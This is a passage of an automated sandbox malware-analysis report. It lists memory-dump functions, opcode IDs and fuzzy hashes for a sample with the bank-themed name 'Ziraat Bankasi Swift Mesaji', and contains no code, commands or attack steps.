                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e20eee044d3795d75685e1ac1bcd50234d6ee3d2499eabd60391c71e14b45016
                                                                          • Instruction ID: 9fc980adfb8ffee7a67a407e82349ee4a41ec1271d49e5c57e656888a6a455b6
                                                                          • Opcode Fuzzy Hash: e20eee044d3795d75685e1ac1bcd50234d6ee3d2499eabd60391c71e14b45016
                                                                          • Instruction Fuzzy Hash: 3CC1C074E01218CFDB18DFA5C984B9DBBB2BF89304F2081A9D409AB394DB359E85CF50
                                                                          Function 02BECDE0 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 86a39f59b1b55e852cf48dc2b0506afcbe8d819f825bcd41fe8c4fbc70be5eb1
                                                                          • Instruction ID: 39ee2e00b5622283da14f68cd8c94f2130e27a8ba4a79a20b1ce7361c84f434c
                                                                          • Opcode Fuzzy Hash: 86a39f59b1b55e852cf48dc2b0506afcbe8d819f825bcd41fe8c4fbc70be5eb1
                                                                          • Instruction Fuzzy Hash: 32C1C174E01218CFDB19DFA5C994B9DBBB2BF89304F2080A9D809AB354DB359E85CF50
                                                                          Function 02BEF1D8 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 95939b92ba2773df65f4f0027eb2ea2b2ea5406c5d0415ba1b9640a099f722d8
                                                                          • Instruction ID: 88b5699430e4a6c523b2d2aa02778caa58bd5487297201abcc27fb5dd4822786
                                                                          • Opcode Fuzzy Hash: 95939b92ba2773df65f4f0027eb2ea2b2ea5406c5d0415ba1b9640a099f722d8
                                                                          • Instruction Fuzzy Hash: B1C1C175E01218CFDB19DFA5C984B9DBBB2BF89304F2080A9D409AB358DB359E85CF50
                                                                          Function 02BEC530 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 55f6a2db890eec83b5a911f9a537f18f506d73d7f70fdfcef410904c2047ce39
                                                                          • Instruction ID: 0e4aa7411f02ba8ea5104a2370782acfd16b62936b02db89d61329f750775e16
                                                                          • Opcode Fuzzy Hash: 55f6a2db890eec83b5a911f9a537f18f506d73d7f70fdfcef410904c2047ce39
                                                                          • Instruction Fuzzy Hash: C7C1B075E01218CFDB19DFA9C984B9DBBB2BF89304F2080AAD409AB354DB355E85CF50
                                                                          Function 02BEE928 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d0d5d848c0ed66d3324df7db63da062bed952dc31b128b3c4f8e2088c6ed1d72
                                                                          • Instruction ID: 442da68cb7a1bc901e658743ba4ee4f0f1302be035dbe3374d9199c7ce6314f2
                                                                          • Opcode Fuzzy Hash: d0d5d848c0ed66d3324df7db63da062bed952dc31b128b3c4f8e2088c6ed1d72
                                                                          • Instruction Fuzzy Hash: D8C1C074E01218CFDB18DFA5D984B9DBBB2BF89304F2091A9D409AB358DB359E85CF10
                                                                          Function 02BE0D48 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3f7b77ac632975c1a1a06777d390a7f3b97d7588c3f8b582a223f6cf6aead9f4
                                                                          • Instruction ID: 82a835193f8f70fb45610c3cda40904aaa6288bd5ab13f83b02fe107a9c94420
                                                                          • Opcode Fuzzy Hash: 3f7b77ac632975c1a1a06777d390a7f3b97d7588c3f8b582a223f6cf6aead9f4
                                                                          • Instruction Fuzzy Hash: 7FC1C174E01218CFDB18DFA5D984B9DBBB2BF89304F2084A9D409AB358DB355E85CF51
                                                                          Function 05410498 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4539306412.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_5410000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9641c37b4901d2a3c7177a82ff9b8cf37e9a2f985f3bea8d3ad177c864f53e1b
                                                                          • Instruction ID: 41914d3cec03cb42b2e9ac361728deb95a344d8120f5a23c23c57a694c16b1ad
                                                                          • Opcode Fuzzy Hash: 9641c37b4901d2a3c7177a82ff9b8cf37e9a2f985f3bea8d3ad177c864f53e1b
                                                                          • Instruction Fuzzy Hash: 8DC1C174E01218CFDB19DFA5D984B9DBBB2BF89304F2080AAD809AB354DB355E85CF50
                                                                          Function 05410040 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4539306412.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_5410000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 79e8f403a66bce70c8d88b1a83f06409043d5d6824a695c10aac251f70f26e24
                                                                          • Instruction ID: 86f2b956de08005004485edb54330c7e07e172150500dfc24b74f3d756ffa769
                                                                          • Opcode Fuzzy Hash: 79e8f403a66bce70c8d88b1a83f06409043d5d6824a695c10aac251f70f26e24
                                                                          • Instruction Fuzzy Hash: B1C1C175E01218CFDB58DFA5D984B9DBBB2BF89304F2080AAD809AB354DB355E85CF50
                                                                          Function 06E5928E Relevance: .1, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4542334944.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e50000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 746765cc966b07d8f735624d068801d55dcaa86d8355467044e69091df88f269
                                                                          • Instruction ID: fb351a353b179183a99a3f4b7c28a039f9f45a538aad520788a157ce40ab0137
                                                                          • Opcode Fuzzy Hash: 746765cc966b07d8f735624d068801d55dcaa86d8355467044e69091df88f269
                                                                          • Instruction Fuzzy Hash: B6511575E4021ACFDB25EFA4D894BEEBB72FB88304F1080A9991967794DB305D81DF50
                                                                          Function 06E59EAF Relevance: .0, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4542334944.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e50000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c1176696fdd0b3f60a19368bf0859d6d469c5a3a26a28548da16716ab660d0c3
                                                                          • Instruction ID: 45e78bb26331dfb8d9609562666c52b21daa306451a6684bb53647e574a0c888
                                                                          • Opcode Fuzzy Hash: c1176696fdd0b3f60a19368bf0859d6d469c5a3a26a28548da16716ab660d0c3
                                                                          • Instruction Fuzzy Hash: 73D06C78E4421ECECB64EFA998403EDFBB1BF97304F5024AA8558A3614DB309A548E56